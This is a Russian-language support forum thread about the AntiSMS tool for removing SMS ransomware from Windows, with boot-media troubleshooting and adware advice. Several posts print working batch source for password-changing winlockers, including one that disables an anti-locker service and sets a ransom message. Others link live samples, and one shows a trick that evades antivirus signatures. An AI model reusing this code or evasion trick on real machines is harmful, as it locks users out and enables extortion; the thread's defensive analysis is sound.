#1301 11.04.2013 15:38:48

happywanderer
Чудом осчастливленный Миха
Зарегистрирован: 16.02.2010
Сообщений: 895

Re: AntiSMS - Быстрое лечение SMS-троянов (винлокеров, Trojan.Winlock)

andryz80
И что.....?


"Ни один человек не богат настолько, чтобы искупить свое прошлое."

Неактивен

 

#1302 11.04.2013 20:52:43

g0dl1ke
Advanced Member
Зарегистрирован: 12.09.2010
Сообщений: 535

Re: AntiSMS - Быстрое лечение SMS-троянов (винлокеров, Trojan.Winlock)

это так баннеры убирают?

MBTY
http://www.comss.info/page.php?al=TrojanZ

Отредактировано g0dl1ke (11.04.2013 21:15:19)


"Stay a While, and Listen"

Неактивен

 

#1303 11.04.2013 21:54:06

0 0
Advanced Member
Откуда: ☭ exUSSR ☭
Зарегистрирован: 21.10.2012
Сообщений: 409
Вебсайт

Re: AntiSMS - Быстрое лечение SMS-троянов (винлокеров, Trojan.Winlock)

g0dl1ke

Сообщение : Ошибка (#950)
Возникла ошибка, возможно, неверный адрес?

http://www.comss.info/page.php?al=TrojanZekos
Правильная ссылка такая ?

http://i46.fastpic.ru/big/2013/0412/e3/4430a98eb96230dde508d3d8e18f06e3.png

Отредактировано 0 0 (12.04.2013 09:39:14)

Неактивен

 

#1304 12.04.2013 09:46:59

g0dl1ke
Advanced Member
Зарегистрирован: 12.09.2010
Сообщений: 535

Re: AntiSMS - Быстрое лечение SMS-троянов (винлокеров, Trojan.Winlock)

0 0
может сюда пойдем?
http://forum.simplix.ks.ua/viewtopic.php?pid=15560


"Stay a While, and Listen"

Неактивен

 

#1305 12.04.2013 11:46:07

swf57.
New member
Зарегистрирован: 04.04.2013
Сообщений: 7

Re: AntiSMS - Быстрое лечение SMS-троянов (винлокеров, Trojan.Winlock)

0 0  Здравствуйте. Попробовал загрузить образ диска с отключонным НОДом: после сканирования = результат тот-же, архив повреждён! Контрольные суммы МД5, совпадают. Скачал CDBurnerXP 4.5.1.3886.exe, попробовал создать ИСО, включил режим проверки записи диска, в режиме проверки, прогрмма зависла. Пришлось комп. выключать кнопкой. Воспользовавшись ссылкой Update[iso].exe на компе запустился плеер Медиа центр и создать образ у меня не получилось. При повторной попытке открыть Update[iso].exe, всплывает окно с предупреждением об ограничении использования программы,обращайтесь к Администратору.  sad

Неактивен

 

#1306 12.04.2013 14:30:33

0 0
Advanced Member
Откуда: ☭ exUSSR ☭
Зарегистрирован: 21.10.2012
Сообщений: 409
Вебсайт

Re: AntiSMS - Быстрое лечение SMS-троянов (винлокеров, Trojan.Winlock)

swf57., раз контрольные суммы верные - то скачен правильно.
С записанного образа пробовали грузится?
Чем не устраивает загрузочная флешка?

1. Скачиваете http://antisms.com/AntiSMSusb.exe
2. Скачиваете http://antisms.com/AntiSMS.iso
; Оба файла должны лежать в одной папке.
3. Вставляете флешку.
; Внимание! Все данные на флешке будут уничтожены, так что если они важны - делайте копии.
4. Запускаете AntiSMSusb и нажимаете Старт
5. Дожидаетесь сообщения "Теперь всё готово!"
; Теперь можете загружаться с флешки.

Отредактировано 0 0 (12.04.2013 19:04:30)

Неактивен

 

#1307 12.04.2013 15:13:01

warikkk
Member
Откуда: Донецк
Зарегистрирован: 27.11.2011
Сообщений: 24

Re: AntiSMS - Быстрое лечение SMS-троянов (винлокеров, Trojan.Winlock)

g0dl1ke Спасибо!

Неактивен

 

#1308 12.04.2013 16:30:57

olzaruta
Member
Зарегистрирован: 08.03.2012
Сообщений: 41

Re: AntiSMS - Быстрое лечение SMS-троянов (винлокеров, Trojan.Winlock)

Trojan.Hosts паролит существующую учетку http://rghost.ru/45159385  Пароль: infected

Неактивен

 

#1309 12.04.2013 18:26:27

jimq
Member
Зарегистрирован: 28.03.2013
Сообщений: 13

Re: AntiSMS - Быстрое лечение SMS-троянов (винлокеров, Trojan.Winlock)

привет всем. вот, уже второй раз, наткнулся на новенький троянчег. в первый раз, когда подцепил, пришлось винду новую поставить, не мог разобраться. смотрел файл hosts, а он чистый. сейчас виросописатели поступают умнее. просто блокировать уже смысла нет. троян сидит в памяти и не даёт входить на популярные соц сети, такие как вконтакте, маил, фэйсбук. пишет, что якобы с вашего аккаунта замечен спам, потом просит ввести номер телефона, на который приходит код активации. код разумеется не с официальных сайтов соц сетей, а с короткого номера, предположительно после того как активируешь, несколько сотен рэ улетит в карман нехорошим людям.
Выявил его я только AntiWinLockerCD Pro(спасибо Брызгалову Сергею). Его активность: после запуска трояна, он создаёт 2 файла и прописывается в автозагрузку и добавляется в планировщик по пути C:\Documents and Settings\All Users\Application Data\Mozilla (у меня Windows XP)
забрать и попробовать на виртуалке можно отсюда: http://rghost.ru/45236801

Отредактировано jimq (12.04.2013 18:32:11)

Неактивен

 

#1310 12.04.2013 18:44:06

0 0
Advanced Member
Откуда: ☭ exUSSR ☭
Зарегистрирован: 21.10.2012
Сообщений: 409
Вебсайт

Re: AntiSMS - Быстрое лечение SMS-троянов (винлокеров, Trojan.Winlock)

olzaruta сообщает:

Trojan.Hosts паролит существующую учетку http://rghost.ru/45159385  Пароль: infected


Код:

@shift
@echo off
net user %username% "00001"
RUNDLL32.exe USER32.dll,LockWorkStation

Ай какой страшный))) И сие обёрнуто этим - Quick Batch File Compiler

Неактивен

 

#1311 12.04.2013 18:53:47

swf57.
New member
Зарегистрирован: 04.04.2013
Сообщений: 7

Re: AntiSMS - Быстрое лечение SMS-троянов (винлокеров, Trojan.Winlock)

0 0 Да, не однократно пробовал загрузится, итог: Loading Mini Windows PE. Windows could not start due to an error while booting from a RAMDISK. Windows failed to open the RAMDICK image. File\BOOT\WINPE.IS_could not be Loaded. The error code is 7. Setup cannot continue.  Press any key to exit. Я понял так,- что получил отказ на старт, система отказала продолжить запуск, из-за установки ключа на выход. Что за ключ? Вкладка на форуме, по флешке, не раскрывается? sad

Неактивен

 

#1312 12.04.2013 19:10:27

0 0
Advanced Member
Откуда: ☭ exUSSR ☭
Зарегистрирован: 21.10.2012
Сообщений: 409
Вебсайт

Re: AntiSMS - Быстрое лечение SMS-троянов (винлокеров, Trojan.Winlock)

swf57., "вкладка" не открывается - потому что запрещён JavaScript в браузере. Убрал спойлер.
Касаемо "The error code is 7.": возможно что-то с оперативкой (неисправна или мало её), ну или в биосе настройки не те.
Отпишитесь о конфигурации компьютера. Сколько оперативной памяти, какая Windows ?

Отредактировано 0 0 (12.04.2013 19:11:22)

Неактивен

 

#1313 12.04.2013 19:29:01

swf57.
New member
Зарегистрирован: 04.04.2013
Сообщений: 7

Re: AntiSMS - Быстрое лечение SMS-троянов (винлокеров, Trojan.Winlock)

0 0  Сейчас вкладка раскрылась; скачал оба файла, создал новую папку, скопировал оба файла в папку, сосдал образ на флешку. Сканирую флешку НОДом ,- 2 файла - Архив повреждён, файлы не могут быть извлечены? Сейчас попробую загрузится с флешки снова?  ОС - Windows 7 Макс. ; Tип - x86-based PC ; BIOS 14.04.2010 ; RAM - доступно физич. 799Мб, виртуаль. 1.97Гб, подкачки 1.91Гб.

Отредактировано swf57. (12.04.2013 19:49:43)

Неактивен

 

#1314 12.04.2013 20:24:38

0 0
Advanced Member
Откуда: ☭ exUSSR ☭
Зарегистрирован: 21.10.2012
Сообщений: 409
Вебсайт

Re: AntiSMS - Быстрое лечение SMS-троянов (винлокеров, Trojan.Winlock)

swf57. сообщает:

Сканирую флешку НОДом

Зачем? Вам чтоб ехало или лампочки мигали?
С флешки грузится?

Неактивен

 

#1315 13.04.2013 00:12:31

swf57.
New member
Зарегистрирован: 04.04.2013
Сообщений: 7

Re: AntiSMS - Быстрое лечение SMS-троянов (винлокеров, Trojan.Winlock)

0 0 С флешки загрузился. Появился рабочий стол. Запустил АНТИСМС, теперь буду разбиратся,что к чему. Вобщем, вопрос решон, загрузочная флешка создана. СПАСИБО!!!

Неактивен

 

#1316 15.04.2013 08:41:34

vladshishkin_Forever
Member
Зарегистрирован: 07.04.2012
Сообщений: 11

Re: AntiSMS - Быстрое лечение SMS-троянов (винлокеров, Trojan.Winlock)

Вот, что то типо вируса AntiWinLocker не справляется.
http://rghost.ru/45300476

Неактивен

 

#1317 15.04.2013 09:23:56

g0dl1ke
Advanced Member
Зарегистрирован: 12.09.2010
Сообщений: 535

Re: AntiSMS - Быстрое лечение SMS-троянов (винлокеров, Trojan.Winlock)

lol


Код:

@shift
@echo off
cd %ProgramFiles%\AntiWinLocker
ren ServiceAntiWinLocker.exe ServiceAntiWinLocker1.exe
cd %ProgramFiles(x86)%\AntiWinLocker
ren ServiceAntiWinLocker.exe ServiceAntiWinLocker1.exe
cd %ProgramW6432%\AntiWinLocker
ren ServiceAntiWinLocker.exe ServiceAntiWinLocker1.exe
net stop AntiWinLocker
net stop AntiWinLocker
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /f /v "legalnoticecaption" /t REG_SZ /d "Внимание!"
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /f /v "legalnoticetext" /t REG_SZ /d "Компьютер заблокирован !!!  В связи с несанкционированным доступом к ресурсам содержащим элементы порнографии и пидофилии. Для разблокировка компьютера отправте SMS на номер 5565 с текстом Unlock . В ответ на SMS, придет сообщение с паролем для разблокировки компьютера!"
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "LegalNoticeCaption" /t REG_SZ /d "Внимание!"
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "LegalNoticeText" /t REG_SZ /d "Компьютер заблокирован !!!  В связи с несанкционированным доступом к ресурсам содержащим элементы порнографии и пидофилии. Для разблокировка компьютера отправте SMS на номер 5565 с текстом Unlock . В ответ на SMS, придет сообщение с паролем для разблокировки компьютера!"
net user %username% "Julia_HuliYa"
net user Администратор "Julia_HuliYa"
RUNDLL32.exe USER32.dll,LockWorkStation

краткое описание:
1. запускаем полученный где та файл
2. винда блокируется и требует ввода пароля (который естественно мы не знаем)
3. при перезагрузке выводится страшное сообщение о том, что комп блокирован и бла бла бла

хронологию можно посмотреть тут:
Скрытый текст (раскрыть): http://img163.imageshack.us/img163/8456/thumbyhq.jpg  http://img593.imageshack.us/img593/8968/thumb2bp.jpg  http://img543.imageshack.us/img543/8726/thumb3gfd.jpg  http://img441.imageshack.us/img441/5323/thumb4w.jpg

http://img255.imageshack.us/img255/2824/thumb5ok.jpg  http://img259.imageshack.us/img259/9035/thumb6mj.jpg  http://img14.imageshack.us/img14/2569/thumb7s.jpg  http://img829.imageshack.us/img829/6835/thumb8gp.jpg

Отредактировано g0dl1ke (15.04.2013 09:43:12)


"Stay a While, and Listen"

Неактивен

 

#1318 15.04.2013 17:29:25

olzaruta
Member
Зарегистрирован: 08.03.2012
Сообщений: 41

Re: AntiSMS - Быстрое лечение SMS-троянов (винлокеров, Trojan.Winlock)

g0dl1ke

- Точно такой же вирус я выкладывал ..чуть ранее http://forum.simplix.ks.ua/viewtopic.ph … 619#p15619
@shift
@echo off
net user %username% "00001"
RUNDLL32.exe USER32.dll,LockWorkStation

Пароль на вход 00001

- Здесь в принципе то же самое..правда добавилось сообщение об отправке смс
- Пароль на вход Julia_HuliYa  ,но есть одна особенность, здесь нужно вводить пароль с
  учетом переключения на заглавные буквы и обязательно пробел с подчеркиванием.
- Вирус подвергнет в шок простого пользователя, и думаю смс будет отправлена lol
- Жаль.... AntiSMS не справилась с  таким видом вымогательства!

ps Метод избавления от этого очень прост:
- вводим запрашиваемый пароль,
- входим в систему
- затем в учетной записи делаем изменения: или меняем пароль или вообще его не ставим
shock

Отредактировано olzaruta (15.04.2013 17:53:10)

Неактивен

 

#1319 15.04.2013 18:49:26

art9
Advanced Member
Зарегистрирован: 14.02.2012
Сообщений: 542
Вебсайт

Re: AntiSMS - Быстрое лечение SMS-троянов (винлокеров, Trojan.Winlock)

Кстати, хоть и примитив, но введет в замешательство полуопытного пользователя, который уже успешно удалял винлоки через командную строку Безопасного режима или с помощью AntiSMS.

Как вариант: добавить возможность сбрасывать пароли на учетные записи Windows.

А если пофантазировать: новый подобный винлок будет при установке пароля на учетки также шифровать файлы с помощью стандартного средства Windows (cipher). Тогда примитив станет довольно опасным шифровальщиком при установке сложного пароля.

И еще, мало какая проактивка антивируса среагирует на действия этого трояна.
А сигнатурное детектирование? Ведь, чтобы создать новое непалещееся тело достаточно bat файл разбавить пустыми переменными, вроде %dsfhjfshjshfsk%

Данный bat файл DrWeb определил как "Trojan.Winlock.8310", я всего лишь вторую строку разбавил одной пустой переменной:


Код:

@ec%fdgdhgds%ho off

И этот антивирус уже не определил зловреда. Т.е. такие винлоки можно создавать с новой неопределяемой сигнатурой сотнями штук в секунду.

Отредактировано art9 (15.04.2013 21:27:15)

Неактивен

 

#1320 17.04.2013 15:37:33

swf57.
New member
Зарегистрирован: 04.04.2013
Сообщений: 7

Re: AntiSMS - Быстрое лечение SMS-троянов (винлокеров, Trojan.Winlock)

0 0  Здравствуйте. Это снова я. Интересная вещь получилась с AntiSMS.iso. После создания загрузочной флешки, я три раза запускался с флешки, всё было ОК. Через день, запускаюсь,- идёт загрузка, затем внизу экрана штрих код и комп. запускается в обычном режиме. После не однократных попыток, решил создать СД диск \который раньше создавался с ошибкой\ из папки загружаю диск, создаётся без ошибки !! Загружаюсь с диска: загрузка, штрих код, ВИНДОС, загрузка, штрх код,ВИНДОС........... Отключаю СД. Загружаюсь с флешки: Вспыхивает на мгновение КРАСНИЙ экран,\ Только и успел увидеть, Режм БИОС \ комп. выключился. Запускаю комп. в Обычном режиме, всё ОК. Загружаюсь СД диска, то-же самое, что было описано выше. С флешки, сначала загрузка затем Обычный режим. Запускаю Антивирусы: DrWeb.cureit.exe: Advanced System Care Uitimate: AVZ4 = вирусов нет. Сегодня попробовал загрузится с флешки и диска,- с обеих загружается, всё ОК. Вот поэтому и решил сообщить на форум. Что это могло быть?

Неактивен

 

#1321 22.04.2013 17:05:17

Павел
Забанен
Зарегистрирован: 18.10.2012
Сообщений: 82

Re: AntiSMS - Быстрое лечение SMS-троянов (винлокеров, Trojan.Winlock)

Симпликс здравствуйте. А намечается сделать АнтиСМС на Win Pe 4?

Неактивен

 

#1322 22.04.2013 18:10:50

weldance
Advanced Member
Зарегистрирован: 11.06.2012
Сообщений: 135

Re: AntiSMS - Быстрое лечение SMS-троянов (винлокеров, Trojan.Winlock)

Павел
берешь любой win pe и запускаешь заранее скопированный antisms.exe (рядом ложишь файлы Hashes.bin и SysFiles.bin)

Неактивен

 

#1323 23.04.2013 01:12:55

viprus
Member
Зарегистрирован: 13.02.2010
Сообщений: 31

Re: AntiSMS - Быстрое лечение SMS-троянов (винлокеров, Trojan.Winlock)

Приветствую Автора и всех знающих людей. Видимо не по теме пост, прошу прощения заранее, но возможно кто-то сможет помочь. Итак.
Всплывающее окно в браузерах
Возникла задачка, сам никак не осилю. У знакомого вот уже пару недель в браузерах по левому краю вертикально появляется полоска с рекламой сомнительного содержания, шириной сантиметров 5. Полоска ничего не блокирует и легко закрывается щелчком по крестику и слову "Закрыть". Снова появляется только при обновлении страницы или на новых вкладках. К какому-либо сайту не привязана, появляется после загрузки страницы и паузы в минуту-другую. В разных браузерах. Сделал полную проверку антивирусом со свежими базами (DrWeb v8), прогнал Malwarebytes, руками проверил ветки автозагрузки в реестре (какие знаю). Почистил руками все временные папки, кэши браузеров, обновил браузеры до актуального состояния, установил Ad Block Plus (последнее привело к тому, что окно теперь появляется в свёрнутом состоянии - конечно уже не так раздражает, но... хочется радикально решить проблему), прогнал avz с актуальными базами, вот его отчёт: http://rlu.ru/qUs
Впервые встал в тупик, не знаю куда копать. Я сначала думал, что это только в Опере. Был случай, когда в её папку
закидывались файлы настроек от старых версий (opera6) и ни какая переустановка браузера не помогала, но тут зараза и в IE и в Мозилле появляется.
По отчёту могу сказать, что у меня сначала вызвал подозрение hfs.exe в автозагрузке, но это оказалась какая-то их нужная программа, стоит у них "официально" в Программ файлс уже пару лет, не прячется, и ни чему никогда не мешала, deskpan.dll - файл сборки винды, стоит везде где она установлена, rpshell.dll - кусок Реал Плеера (стоял в расширениях и дополнениях к браузерам), обновил его вместе с остальными, не похоже на него, sptd - это "знакомец" - драйвер виртуального привода от Даймонд Тулс, тоже думаю не при делах. Хост сразу посмотрел ничего не нашёл, на всякий случай почистил, не помогло. На файлы от NV (видеодрайвер) тоже грешить трудно, вроде частенько присутствуют.
Случай не для АнтиСМС, конечно, хочу попробовать антируткит прогнать (http://rlu.ru/qVv) жаль только что клиент живёт далеко, теперь к нему попаду только через недельку. Буду бороться дальше, если какие-то мысли будут, то здорово.
ЗЫ А вот на днях у другого приятеля абсолютно такой же случай: http://rlu.ru/rbz
В архиве снова отчёт avz и скрин заразы в IE. И опять ничего найти не могу... unknown

Неактивен

 

#1324 23.04.2013 06:42:06

art9
Advanced Member
Зарегистрирован: 14.02.2012
Сообщений: 542
Вебсайт

Re: AntiSMS - Быстрое лечение SMS-троянов (винлокеров, Trojan.Winlock)

viprus
это xp sp2? Если так, то нужно установить sp3.

затем:
" Рекламные посторонние баннеры в браузерах - для решения этой проблемы выполните следущие действия:
1) деинсталлируете программы, которые содержат слово "webalta";
2) проверьте компьютер бесплатным антивирусным сканером, затем запустите утилиту AntiDust, потом проверьте компьютер с помощью AdwCleaner (by Xplode);
3) почистите кэш и куки в браузерах, кэш DNS, например, с помощью программы ccleaner;
4) проверьте настройки роутера на наличие чужих DNS;
5) с помошью программы Hijackthis проверьте наличие чужих DNS (секция О17), если найдете в данной секции чужие DNS, то пофиксите их ("Fix checked").

Как определить чужой DNS или нет: проверьте его IP на сайте 2ip.ru - если окажется, что он другой страны, то скорее всего, что он зловредный.

Если после очистки DNS пропадет доступ в интернет, то следует открыть свойства сетевого адаптера и прописать туда DNS выданный провайдером или Google DNS 8.8.8.8 в крайнем случае."

Неактивен

 

#1325 23.04.2013 10:03:44

simplix
Administrator
Зарегистрирован: 28.07.2008
Сообщений: 2826
Вебсайт

Re: AntiSMS - Быстрое лечение SMS-троянов (винлокеров, Trojan.Winlock)

viprus сообщает:

Случай не для АнтиСМС, конечно

Из всего этого не понятно, запускали вы AntiSMS или нет. У меня встречался такой баннер и программа его лечила.

Неактивен

 

Board footer


Рекомендации: OSZone, Comss, Ru-Board
© simplix